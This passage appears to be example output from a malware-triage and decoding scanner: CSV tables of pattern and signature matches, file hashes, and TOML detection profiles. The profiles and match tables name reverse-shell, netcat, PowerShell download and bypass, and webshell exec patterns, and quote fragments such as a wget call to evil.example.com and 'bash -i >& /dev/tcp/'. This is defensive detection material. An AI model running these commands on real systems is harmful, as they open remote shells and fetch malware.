11	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b	Browser History	regex	History	4:11	7
12	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b	Browser History URL	regex	https://example.com	5:5	19
13	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b	Browser History URL	regex	https://mail.google.com	6:5	23
14	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b	Browser History URL	regex	https://github.com	7:5	18
15	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b	Browser History URL	regex	http://suspicious-site.example.com	8:5	34
16	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b	Cookie Data	regex	Cookie	10:3	6
17	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b	Cookie Data	regex	cookie	11:0	6
18	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b	Cookie Data	regex	session_id	11:8	10
19	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b	Cookie Data	regex	cookie	12:0	6
20	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b	Cookie Data	regex	auth_token	12:8	10
21	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b	Cookie Data	regex	Cookie	13:4	6
22	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b	Registry Hive	regex	Sam	1:2	3
23	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b	Registry Hive	regex	Software	21:5	8
24	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b	Registry Hive	regex	NTUSER.DAT	22:0	10
25	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b	Registry Hive	regex	SAM	23:0	3
26	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b	Run Key	regex	CurrentVersion\Run	21:32	18

signature_matches.csv

id	signature_name	sha256
1	Potential Data Exfiltration	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b
2	Browser Forensic Artifacts	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b
3	High Value Artifacts	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b
4	Multiple Indicators	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b

unique_files.csv

sha256	sha1	md5	file_size	mime_type_for_content	shannon_entropy
02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b	ea5a887633c8bd219c8a6246d47e60595eb51eb0	8319f272c8364b72070c0e7f2aef66de	665	text/plain	5.25520055683943

Example: malware-analysis

Inputs

examples/inputs/malware-analysis-samples/java_webshell.java
examples/inputs/malware-analysis-samples/powershell_attack.ps1
examples/inputs/malware-analysis-samples/python_malware_patterns.py
examples/inputs/malware-analysis-samples/suspicious_shell_script.sh

Profile

# Malware Analysis Profile
# Profile for analyzing potentially malicious files

decode = ["base64", "hex", "unicode-escape-sequences"]

max-file-size = 104857600  # 100 MiB

include-path-globs = []
exclude-path-globs = []

tag = "malware-analysis"

# Suspicious Shell Commands
[[patterns]]
  name = "wget/curl Download"
  pattern = "(wget|curl)\\s+[^\\s]+"
  type = "regex"

[[patterns]]
  name = "Base64 Decode Command"
  pattern = "base64\\s+-d"
  type = "regex"

[[patterns]]
  name = "Netcat Command"
  pattern = "(nc|netcat|ncat)\\s+-[elvp]"
  type = "regex"

[[patterns]]
  name = "Reverse Shell"
  pattern = "bash\\s+-i\\s+>&\\s*/dev/tcp/"
  type = "regex"

# PowerShell Indicators
[[patterns]]
  name = "PowerShell Encoded Command"
  pattern = "-enc(odedcommand)?\\s+"
  type = "regex"
  case-insensitive = true

[[patterns]]
  name = "PowerShell Download"
  pattern = "Invoke-WebRequest|IWR|wget|curl|DownloadString|DownloadFile"
  type = "regex"
  case-insensitive = true

[[patterns]]
  name = "PowerShell Bypass"
  pattern = "-ep\\s+bypass|-ExecutionPolicy\\s+Bypass"
  type = "regex"
  case-insensitive = true

# Java/Web Shell Indicators
[[patterns]]
  name = "Java Runtime Exec"
  pattern = "Runtime\\.getRuntime\\(\\)\\.exec\\("
  type = "regex"

[[patterns]]
  name = "Process Builder"
  pattern = "new\\s+ProcessBuilder\\("
  type = "regex"

[[patterns]]
  name = "JSP Shell Indicator"
  pattern = "getParameter.*exec|Runtime.*getParameter"
  type = "regex"

# Python Indicators
[[patterns]]
  name = "Python Exec"
  pattern = "(exec|eval)\\s*\\([^)]+\\)"
  type = "regex"

[[patterns]]
  name = "Python Subprocess"
  pattern = "subprocess\\.(call|run|Popen)"
  type = "regex"

[[patterns]]
  name = "Python os.system"
  pattern = "os\\.system\\s*\\("
  type = "regex"

# Obfuscation Indicators
[[patterns]]
  name = "Variable Named Payload"
  pattern = "(payload|shellcode|shell_code)\\s*="
  type = "regex"
  case-insensitive = true

[[patterns]]
  name = "Long Hex String"
  pattern = "[0-9a-fA-F]{64,}"
  type = "regex"

# File Format Signatures (embedded in non-matching files)
[[patterns]]
  name = "Embedded ELF"
  pattern = "7F:45:4C:46"
  type = "bytes"

[[patterns]]
  name = "Embedded PE (MZ)"
  pattern = "4D:5A:90:00"
  type = "bytes"

# Signatures
[[signatures]]
  name = "High Entropy Files (Packed/Encrypted)"
  query = "SELECT sha256 FROM unique_files WHERE shannon_entropy > 7.0"

[[signatures]]
  name = "Small Suspicious Files"
  query = "SELECT sha256 FROM unique_files WHERE file_size < 10000 AND sha256 IN (SELECT sha256 FROM pattern_matches)"

[[signatures]]
  name = "Files with Multiple Indicators"
  query = "SELECT sha256, COUNT(DISTINCT pattern_name) as indicator_count FROM pattern_matches GROUP BY sha256 HAVING indicator_count > 3"

Report outputs

Triage report (converted from triage_report.json)

total_files	7
critical_count	0
high_count	0
medium_count	0
low_count	3
minimal_count	4
must_investigate_count	0
all_scores	None
generated_at	2025-12-03T09:19:43.647661366+00:00

top_scores

file_type	file_type_score	must_investigate	path	pattern_count_score	pattern_matches	pattern_severity_score	reasons	risk_level	score	sha256
Script	20	False	/suspicious_shell_script.sh	15	12	12	["12 suspicious patterns detected"]	Low	47	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707
Script	20	False	/python_malware_patterns.py	15	11	11	["11 suspicious patterns detected"]	Low	46	1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620
Script	20	False	/powershell_attack.ps1	10	8	10	["8 suspicious patterns detected"]	Low	40	c2801a05678b65995a653083595d45411aa341a4188475b791aac2568edff2a2
Other	0	False	/suspicious_shell_script.sh/suspicious_shell_script.sh.unicode-escape-sequences	15	12	12	["12 suspicious patterns detected"]	Minimal	27	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d
Other	0	False	/python_malware_patterns.py/python_malware_patterns.py.unicode-escape-sequences	15	11	11	["11 suspicious patterns detected"]	Minimal	26	ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b
Other	0	False	/powershell_attack.ps1/powershell_attack.ps1.unicode-escape-sequences	10	8	10	["8 suspicious patterns detected"]	Minimal	20	f47e6c85d534fb6fc386c20010d04162f66ea1d3d8e2a2d7e13e8364d9e2b9b0
Other	0	False	/java_webshell.java	10	7	9	["7 suspicious patterns detected"]	Minimal	19	048ed5ccb9b83a273c4d2e70076a087616acd54bb9559e957f3a423895ab9701

path	file_name	sha256	file_created	file_modified	file_accessed	mime_types_from_file_extension	is_decoded_file
/suspicious_shell_script.sh/suspicious_shell_script.sh.unicode-escape-sequences	suspicious_shell_script.sh.unicode-escape-sequences	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d				[]	1
/suspicious_shell_script.sh	suspicious_shell_script.sh	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	["text/x-shellscript"]	0
/powershell_attack.ps1/powershell_attack.ps1.unicode-escape-sequences	powershell_attack.ps1.unicode-escape-sequences	f47e6c85d534fb6fc386c20010d04162f66ea1d3d8e2a2d7e13e8364d9e2b9b0				[]	1
/python_malware_patterns.py/python_malware_patterns.py.unicode-escape-sequences	python_malware_patterns.py.unicode-escape-sequences	ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b				[]	1
/python_malware_patterns.py	python_malware_patterns.py	1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	["text/x-script.python"]	0
/powershell_attack.ps1	powershell_attack.ps1	c2801a05678b65995a653083595d45411aa341a4188475b791aac2568edff2a2	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	[]	0
/java_webshell.java	java_webshell.java	048ed5ccb9b83a273c4d2e70076a087616acd54bb9559e957f3a423895ab9701	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	[]	0

pattern_matches.csv

id	sha256	pattern_name	match_type	match	location	length
1	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d	wget/curl Download	regex	wget http://evil.example.com/malware.sh	6:0	39
2	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d	wget/curl Download	regex	curl -O	7:0	7
3	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d	Base64 Decode Command	regex	base64 -d	10:26	9
4	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d	Netcat Command	regex	nc -l	13:0	5
5	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d	Netcat Command	regex	netcat -e	14:0	9
6	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d	Reverse Shell	regex	bash -i >& /dev/tcp/	17:0	20
7	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d	PowerShell Download	regex	wget	6:0	4
8	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d	PowerShell Download	regex	curl	7:0	4
9	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d	Variable Named Payload	regex	payload=	20:0	8
10	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d	Variable Named Payload	regex	shellcode=	21:0	10
11	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d	Variable Named Payload	regex	shell_code =	22:0	12
12	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d	Long Hex String	regex	4d5a90000300000004000000ffff0000b80000000000000040000000000000004d5a90000300000004000000ffff0000b80000000000000040	25:10	114
13	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707	wget/curl Download	regex	wget http://evil.example.com/malware.sh	6:0	39
14	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707	wget/curl Download	regex	curl -O	7:0	7
15	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707	Base64 Decode Command	regex	base64 -d	10:26	9
16	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707	Netcat Command	regex	nc -l	13:0	5
17	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707	Netcat Command	regex	netcat -e	14:0	9
18	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707	Reverse Shell	regex	bash -i >& /dev/tcp/	17:0	20
19	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707	PowerShell Download	regex	wget	6:0	4
20	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707	PowerShell Download	regex	curl	7:0	4
21	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707	Variable Named Payload	regex	payload=	20:0	8
22	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707	Variable Named Payload	regex	shellcode=	21:0	10
23	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707	Variable Named Payload	regex	shell_code =	22:0	12
24	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707	Long Hex String	regex	4d5a90000300000004000000ffff0000b80000000000000040000000000000004d5a90000300000004000000ffff0000b80000000000000040	25:10	114
25	f47e6c85d534fb6fc386c20010d04162f66ea1d3d8e2a2d7e13e8364d9e2b9b0	PowerShell Encoded Command	regex	-encodedcommand	5:15	16
26	f47e6c85d534fb6fc386c20010d04162f66ea1d3d8e2a2d7e13e8364d9e2b9b0	PowerShell Encoded Command	regex	-enc	6:11	5
27	f47e6c85d534fb6fc386c20010d04162f66ea1d3d8e2a2d7e13e8364d9e2b9b0	PowerShell Download	regex	Invoke-WebRequest	9:0	17
28	f47e6c85d534fb6fc386c20010d04162f66ea1d3d8e2a2d7e13e8364d9e2b9b0	PowerShell Download	regex	IWR	10:0	3
29	f47e6c85d534fb6fc386c20010d04162f66ea1d3d8e2a2d7e13e8364d9e2b9b0	PowerShell Download	regex	DownloadString	11:27	14
30	f47e6c85d534fb6fc386c20010d04162f66ea1d3d8e2a2d7e13e8364d9e2b9b0	PowerShell Download	regex	DownloadFile	12:27	12
31	f47e6c85d534fb6fc386c20010d04162f66ea1d3d8e2a2d7e13e8364d9e2b9b0	PowerShell Bypass	regex	-ep bypass	15:15	10
32	f47e6c85d534fb6fc386c20010d04162f66ea1d3d8e2a2d7e13e8364d9e2b9b0	PowerShell Bypass	regex	-ExecutionPolicy Bypass	16:11	23
33	ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b	Python Exec	regex	exec(user_input)	20:0	16
34	ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b	Python Exec	regex	eval("__import__('os')	21:0	22
35	ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b	Python Exec	regex	exec(decoded)	26:0	13
36	ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b	Python Subprocess	regex	subprocess.call	14:0	15
37	ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b	Python Subprocess	regex	subprocess.run	15:0	14
38	ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b	Python Subprocess	regex	subprocess.Popen	16:0	16
39	ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b	Python os.system	regex	os.system(	10:0	10
40	ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b	Python os.system	regex	os.system(	11:0	10
41	ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b	Variable Named Payload	regex	payload =	24:8	9
42	ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b	Variable Named Payload	regex	payload =	29:0	9
43	ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b	Variable Named Payload	regex	shellcode =	30:0	11
44	1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620	Python Exec	regex	exec(user_input)	20:0	16
45	1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620	Python Exec	regex	eval("__import__('os')	21:0	22
46	1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620	Python Exec	regex	exec(decoded)	26:0	13
47	1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620	Python Subprocess	regex	subprocess.call	14:0	15
48	1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620	Python Subprocess	regex	subprocess.run	15:0	14
49	1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620	Python Subprocess	regex	subprocess.Popen	16:0	16
50	1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620	Python os.system	regex	os.system(	10:0	10
51	1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620	Python os.system	regex	os.system(	11:0	10
52	1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620	Variable Named Payload	regex	payload =	24:8	9
53	1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620	Variable Named Payload	regex	payload =	29:0	9
54	1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620	Variable Named Payload	regex	shellcode =	30:0	11
55	c2801a05678b65995a653083595d45411aa341a4188475b791aac2568edff2a2	PowerShell Encoded Command	regex	-encodedcommand	5:15	16
56	c2801a05678b65995a653083595d45411aa341a4188475b791aac2568edff2a2	PowerShell Encoded Command	regex	-enc	6:11	5
57	c2801a05678b65995a653083595d45411aa341a4188475b791aac2568edff2a2	PowerShell Download	regex	Invoke-WebRequest	9:0	17
58	c2801a05678b65995a653083595d45411aa341a4188475b791aac2568edff2a2	PowerShell Download	regex	IWR	10:0	3
59	c2801a05678b65995a653083595d45411aa341a4188475b791aac2568edff2a2	PowerShell Download	regex	DownloadString	11:27	14
60	c2801a05678b65995a653083595d45411aa341a4188475b791aac2568edff2a2	PowerShell Download	regex	DownloadFile	12:27	12
61	c2801a05678b65995a653083595d45411aa341a4188475b791aac2568edff2a2	PowerShell Bypass	regex	-ep bypass	15:15	10
62	c2801a05678b65995a653083595d45411aa341a4188475b791aac2568edff2a2	PowerShell Bypass	regex	-ExecutionPolicy Bypass	16:11	23
63	048ed5ccb9b83a273c4d2e70076a087616acd54bb9559e957f3a423895ab9701	Java Runtime Exec	regex	Runtime.getRuntime().exec(	16:24	26
64	048ed5ccb9b83a273c4d2e70076a087616acd54bb9559e957f3a423895ab9701	Java Runtime Exec	regex	Runtime.getRuntime().exec(	25:8	26
65	048ed5ccb9b83a273c4d2e70076a087616acd54bb9559e957f3a423895ab9701	Process Builder	regex	new ProcessBuilder(	21:28	19
66	048ed5ccb9b83a273c4d2e70076a087616acd54bb9559e957f3a423895ab9701	JSP Shell Indicator	regex	getParameter and exec	24:45	21
67	048ed5ccb9b83a273c4d2e70076a087616acd54bb9559e957f3a423895ab9701	JSP Shell Indicator	regex	Runtime.getRuntime().exec(request.getParameter	25:8	46
68	048ed5ccb9b83a273c4d2e70076a087616acd54bb9559e957f3a423895ab9701	Python Exec	regex	exec(cmd)	16:45	9
69	048ed5ccb9b83a273c4d2e70076a087616acd54bb9559e957f3a423895ab9701	Python Exec	regex	exec(request.getParameter("command")	25:29	36

signature_matches.csv

id	signature_name	sha256
1	Small Suspicious Files	048ed5ccb9b83a273c4d2e70076a087616acd54bb9559e957f3a423895ab9701
2	Small Suspicious Files	1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620
3	Small Suspicious Files	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d
4	Small Suspicious Files	c2801a05678b65995a653083595d45411aa341a4188475b791aac2568edff2a2
5	Small Suspicious Files	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707
6	Small Suspicious Files	ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b
7	Small Suspicious Files	f47e6c85d534fb6fc386c20010d04162f66ea1d3d8e2a2d7e13e8364d9e2b9b0
8	Files with Multiple Indicators	048ed5ccb9b83a273c4d2e70076a087616acd54bb9559e957f3a423895ab9701
9	Files with Multiple Indicators	1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620
10	Files with Multiple Indicators	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d
11	Files with Multiple Indicators	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707
12	Files with Multiple Indicators	ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b

unique_files.csv

sha256	sha1	md5	file_size	mime_type_for_content	shannon_entropy
9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d	668f48403d95b4045624ef0a60a30aa1363fd32b	ed091b801594999629905096f58a118c	740	text/x-shellscript	5.1272899157043
da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707	7f94d673cd80619cfe1920bc4c7fb3a02e43b6c8	b7b454a5138bc6a75980cb0506567eef	743	text/x-shellscript	5.14450961095171
f47e6c85d534fb6fc386c20010d04162f66ea1d3d8e2a2d7e13e8364d9e2b9b0	0f2f52cbdd818c6903259a9f3e5f75993bdbb34f	cd959f43adf77e2bdcd31201d19c42bc	827	text/plain	5.32534428153232
ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b	12bce085224aa646bca31adee3b1e5d7a4948136	257a1291b56b7a26349e1347ce48666a	769	text/x-script.python	5.27674554008029
1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620	12450fd01e050c19d9509e6ddb8e087346a66df3	50d10f7f6c0ea2ec95d6eef88f01233e	774	text/x-script.python	5.29893895886362
c2801a05678b65995a653083595d45411aa341a4188475b791aac2568edff2a2	9e32266cbbd34e3e8b3f6e1dc00c39317ef914b6	53f6f93d22c7386bf1515484a6e746a3	830	text/plain	5.34062167439142
048ed5ccb9b83a273c4d2e70076a087616acd54bb9559e957f3a423895ab9701	3885920b8c21fa39f31bef985f8b864adfb01c1f	b03345873b6adc8dfaf9d57b0fb4ffaa	998	text/plain	4.7078031772999

Example: multi-decode

Inputs

examples/inputs/multi-decode-samples/encoded_content.txt

Profile

# Multi-Layer Content Decoding Example Profile
# Demonstrates decoding nested/layered encoded content

# Enable all decoders for multi-layer detection
decode = ["base64", "hex", "percent-encoding", "html-entity", "unicode-escape-sequences"]

max-file-size = 10485760  # 10 MiB

tag = "multi-decode"

# Patterns to find in decoded content
[[patterns]]
  name = "Decoded Password"
  pattern = "password"
  type = "string"
  case-insensitive = true

[[patterns]]
  name = "Decoded Secret"
  pattern = "secret"
  type = "string"
  case-insensitive = true

[[patterns]]
  name = "Decoded Shell Command"
  pattern = "/bin/(bash|sh|zsh)"
  type = "regex"

[[patterns]]
  name = "Decoded PowerShell"
  pattern = "powershell"
  type = "string"
  case-insensitive = true

[[patterns]]
  name = "Decoded URL"
  pattern = "https?://[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}"
  type = "regex"

[[patterns]]
  name = "Decoded IP Address"
  pattern = "\\b(?:\\d{1,3}\\.){3}\\d{1,3}\\b"
  type = "regex"

[[patterns]]
  name = "Decoded Eval"
  pattern = "eval\\s*\\("
  type = "regex"

[[patterns]]
  name = "Decoded Exec"
  pattern = "exec\\s*\\("
  type = "regex"

Report outputs

Triage report (converted from triage_report.json)

total_files	13
critical_count	0
high_count	0
medium_count	0
low_count	0
minimal_count	13
must_investigate_count	0
all_scores	None
generated_at	2025-12-03T09:19:44.021571999+00:00

top_scores

file_type	must_investigate	path	pattern_count_score	pattern_matches	pattern_severity_score	reasons	risk_level	score	sha256
Other	False	/encoded_content.txt/encoded_content.txt.percent-encoding/encoded_content.txt.percent-encoding.html-entities/encoded_content.txt.percent-encoding.html-entities.unicode-escape-sequences	15	13	12	["13 suspicious patterns detected"]	Minimal	27	352f2322f3161013de22b3b889f630f4af4e935fd68b41221b0eb6a4cad31c33
Other	False	/encoded_content.txt/encoded_content.txt.percent-encoding/encoded_content.txt.percent-encoding.html-entities	15	12	12	["12 suspicious patterns detected"]	Minimal	27	df654a907a0f491a0b72935ea60a65a183ef5aced6c7b6c27701f7f100e6dbfb
Other	False	/encoded_content.txt/encoded_content.txt.percent-encoding/encoded_content.txt.percent-encoding.unicode-escape-sequences/encoded_content.txt.percent-encoding.unicode-escape-sequences.html-entities	15	13	12	["13 suspicious patterns detected"]	Minimal	27	352f2322f3161013de22b3b889f630f4af4e935fd68b41221b0eb6a4cad31c33
Other	False	/encoded_content.txt/encoded_content.txt.percent-encoding/encoded_content.txt.percent-encoding.unicode-escape-sequences	15	13	12	["13 suspicious patterns detected"]	Minimal	27	312be978a480d5a639fa3ed3ca830a062eaf6ad654407799bade789580488fe4
Other	False	/encoded_content.txt/encoded_content.txt.percent-encoding	15	12	12	["12 suspicious patterns detected"]	Minimal	27	a940cf0d8b9694f5775dcd5e267590b9b700902207f76e81913f9999991f0531
Other	False	/encoded_content.txt/encoded_content.txt.html-entities/encoded_content.txt.html-entities.percent-encoding	15	12	12	["12 suspicious patterns detected"]	Minimal	27	df654a907a0f491a0b72935ea60a65a183ef5aced6c7b6c27701f7f100e6dbfb
Other	False	/encoded_content.txt/encoded_content.txt.html-entities/encoded_content.txt.html-entities.unicode-escape-sequences/encoded_content.txt.html-entities.unicode-escape-sequences.percent-encoding	15	13	12	["13 suspicious patterns detected"]	Minimal	27	352f2322f3161013de22b3b889f630f4af4e935fd68b41221b0eb6a4cad31c33
Other	False	/encoded_content.txt/encoded_content.txt.html-entities/encoded_content.txt.html-entities.unicode-escape-sequences	15	13	12	["13 suspicious patterns detected"]	Minimal	27	444a9458395e7bfd9cbfa05dff249089bf1c438bef713dc0797c778d477245c5
Other	False	/encoded_content.txt/encoded_content.txt.html-entities	15	12	12	["12 suspicious patterns detected"]	Minimal	27	20e66bf70953650ec5ef7db6afedd4f79500eabc1c6db5bca5c31661185dba27
Other	False	/encoded_content.txt/encoded_content.txt.unicode-escape-sequences/encoded_content.txt.unicode-escape-sequences.percent-encoding	15	13	12	["13 suspicious patterns detected"]	Minimal	27	312be978a480d5a639fa3ed3ca830a062eaf6ad654407799bade789580488fe4
Other	False	/encoded_content.txt/encoded_content.txt.unicode-escape-sequences/encoded_content.txt.unicode-escape-sequences.html-entities	15	13	12	["13 suspicious patterns detected"]	Minimal	27	444a9458395e7bfd9cbfa05dff249089bf1c438bef713dc0797c778d477245c5
Other	False	/encoded_content.txt/encoded_content.txt.unicode-escape-sequences	15	13	12	["13 suspicious patterns detected"]	Minimal	27	fb83ac54cccb2c353ee4a53f007dac403f02d9b4f3cbacfdeae93997d5d8f3c2
Other	False	/encoded_content.txt	15	12	12	["12 suspicious patterns detected"]	Minimal	27	7060620c9e47a84c306a4599fcd4f0ccda7c811ce7a22418191716f72a0805ab

path	file_name	sha256	file_created	file_modified	file_accessed	mime_types_from_file_extension	is_decoded_file
/encoded_content.txt/encoded_content.txt.percent-encoding/encoded_content.txt.percent-encoding.html-entities/encoded_content.txt.percent-encoding.html-entities.unicode-escape-sequences	encoded_content.txt.percent-encoding.html-entities.unicode-escape-sequences	352f2322f3161013de22b3b889f630f4af4e935fd68b41221b0eb6a4cad31c33				[]	1
/encoded_content.txt/encoded_content.txt.percent-encoding/encoded_content.txt.percent-encoding.html-entities	encoded_content.txt.percent-encoding.html-entities	df654a907a0f491a0b72935ea60a65a183ef5aced6c7b6c27701f7f100e6dbfb				[]	1
/encoded_content.txt/encoded_content.txt.percent-encoding/encoded_content.txt.percent-encoding.unicode-escape-sequences/encoded_content.txt.percent-encoding.unicode-escape-sequences.html-entities	encoded_content.txt.percent-encoding.unicode-escape-sequences.html-entities	352f2322f3161013de22b3b889f630f4af4e935fd68b41221b0eb6a4cad31c33				[]	1
/encoded_content.txt/encoded_content.txt.percent-encoding/encoded_content.txt.percent-encoding.unicode-escape-sequences	encoded_content.txt.percent-encoding.unicode-escape-sequences	312be978a480d5a639fa3ed3ca830a062eaf6ad654407799bade789580488fe4				[]	1
/encoded_content.txt/encoded_content.txt.percent-encoding	encoded_content.txt.percent-encoding	a940cf0d8b9694f5775dcd5e267590b9b700902207f76e81913f9999991f0531				[]	1
/encoded_content.txt/encoded_content.txt.html-entities/encoded_content.txt.html-entities.percent-encoding	encoded_content.txt.html-entities.percent-encoding	df654a907a0f491a0b72935ea60a65a183ef5aced6c7b6c27701f7f100e6dbfb				[]	1
/encoded_content.txt/encoded_content.txt.html-entities/encoded_content.txt.html-entities.unicode-escape-sequences/encoded_content.txt.html-entities.unicode-escape-sequences.percent-encoding	encoded_content.txt.html-entities.unicode-escape-sequences.percent-encoding	352f2322f3161013de22b3b889f630f4af4e935fd68b41221b0eb6a4cad31c33				[]	1
/encoded_content.txt/encoded_content.txt.html-entities/encoded_content.txt.html-entities.unicode-escape-sequences	encoded_content.txt.html-entities.unicode-escape-sequences	444a9458395e7bfd9cbfa05dff249089bf1c438bef713dc0797c778d477245c5				[]	1
/encoded_content.txt/encoded_content.txt.html-entities	encoded_content.txt.html-entities	20e66bf70953650ec5ef7db6afedd4f79500eabc1c6db5bca5c31661185dba27				[]	1
/encoded_content.txt/encoded_content.txt.unicode-escape-sequences/encoded_content.txt.unicode-escape-sequences.percent-encoding	encoded_content.txt.unicode-escape-sequences.percent-encoding	312be978a480d5a639fa3ed3ca830a062eaf6ad654407799bade789580488fe4				[]	1
/encoded_content.txt/encoded_content.txt.unicode-escape-sequences/encoded_content.txt.unicode-escape-sequences.html-entities	encoded_content.txt.unicode-escape-sequences.html-entities	444a9458395e7bfd9cbfa05dff249089bf1c438bef713dc0797c778d477245c5				[]	1
